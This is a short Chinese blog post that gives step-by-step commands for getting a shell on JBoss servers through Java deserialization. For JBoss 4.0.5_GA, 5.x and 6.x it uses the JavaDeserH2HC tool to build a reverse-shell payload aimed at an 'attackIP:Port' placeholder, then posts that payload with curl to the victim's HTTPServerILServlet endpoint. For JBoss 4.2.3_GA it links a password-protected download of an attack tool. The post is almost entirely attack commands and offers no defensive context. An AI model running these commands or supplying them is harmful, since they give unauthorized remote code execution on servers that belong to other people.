【实战】JBOSS反序列化Getshell

一、JBOSS4.0.5_GA,5.x,6.x

需要JavaDeserH2HC(https://github.com/joaomatosf/JavaDeserH2HC)

操作起来

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap "attackIP:Port"
curl http://victimIP:Port/jbossmq-httpil/HTTPServerILServlet –data-binary @ReverseShellCommonsCollectionsHashMap.ser

二、JBOSS4.2.3_GA

工具走起来

链接:https://pan.baidu.com/s/1qDtC4CytVHjfW_JVvu504g  密码:61h2

posted @ 2019-03-20 15:55  Carrypan  阅读(1453)  评论(0编辑  收藏  举报